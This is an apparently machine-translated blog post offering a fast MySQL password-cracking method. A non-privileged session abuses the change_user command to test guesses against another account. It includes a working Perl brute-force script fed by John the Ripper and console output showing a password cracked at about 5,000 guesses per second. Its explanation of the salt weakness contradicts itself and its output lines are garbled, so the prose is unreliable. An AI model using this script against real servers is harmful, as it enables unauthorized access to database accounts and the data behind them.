Quick MySQL local and remote password cracking! The first thing we need to explain to the database maintenance personnel is that you don't have to worry about it. You don't have to fix it. It seems like a small error.
I have found a method that can effectively crack MySQL user passwords, including local users and user passwords accessed through the network. In my tests, 5000 passwords can be tested every second through the network method.
The method is as follows:
Attackers use a non-privileged account to log on to the MySQL server. mysql has a command named change_user, which can be used to modify the user's name suggestion in the mysql session. This command is executed very quickly, so it can be used to crack the mysql password very quickly, instead of re-connecting to the mysql server every time.
Why is it very slow?
Because the change_user command does not change the SALT (which is a weakness), the server sends a different SALT each time the password is cracked.
The following is a Perl script that uses the John the Ripper method to generate a password:
The test user uses the crackme password as pass, which can be cracked in seconds.
(0.1 million password can be tested in about 20 seconds)
The test script is as follows:
01
use
Net::MySQL;
02
03
$|=1;
04
05
my
$mysql
= Net::MySQL->new(
06
hostname =>
'192.168.2.3'
,
07
database =>
'test'
,
08
user =>
"user"
,
09
password =>
"secret"
,
10
debug => 0,
11
);
12
13
$crackuser
=
"crackme"
;
14
15
while
(<stdin>) {
16
chomp
;
17
$currentpass
=
$_
;
18
19
$vv
=
join
"\0"
,
20
$crackuser
,
21
"\x14"
.
22
Net::MySQL::Password->scramble(
23
$currentpass
,
$mysql
->{salt},
$mysql
->{client_capabilities}
24
) .
"\0"
;
25
if
(
$mysql
->_execute_command(
"\x11"
,
$vv
) ne
undef
) {
26
print
"[*] Cracked! --> $currentpass\n"
;
27
exit
;
28
}
29
}
The following is the execution result on my machine:
C: \ Users \ Kingdom \ Desktop> C: \ Users \ Kingdom \ Desktop \ john179 \ run \ jo
Hn -- incremental -- stdout = 5 | perl mysqlcrack. pl
Warning: MaxLen = 8 is too large for the current hash type, forced CED to 5
Words: 16382 time: 0: 00: 00: 02 w/s: 6262 current: citcH
Words: 24573 time: 0: 00: 00: 04 w/s: 4916 current: rap
Words: 40956 time: 0: 00: 00: 07 w/s: 5498 current: matc3
Words: 49147 time: 0: 00: 00: 09 w/s: 5030 current: 4429
Words: 65530 time: 0: 00: 00: 12 w/s: 5354 current: ch141
Words: 73721 time: 0: 00: 00: 14 w/s: 5021 current: v3n
Words: 90104 time: 0: 00: 00: 17 w/s: 5277 current: pun2
[*] Cracked! --> Pass
Words: 98295 time: 0: 00: 00: 18 w/s: 5434 current: 43gs
Session aborted
Good luck :)
Via grok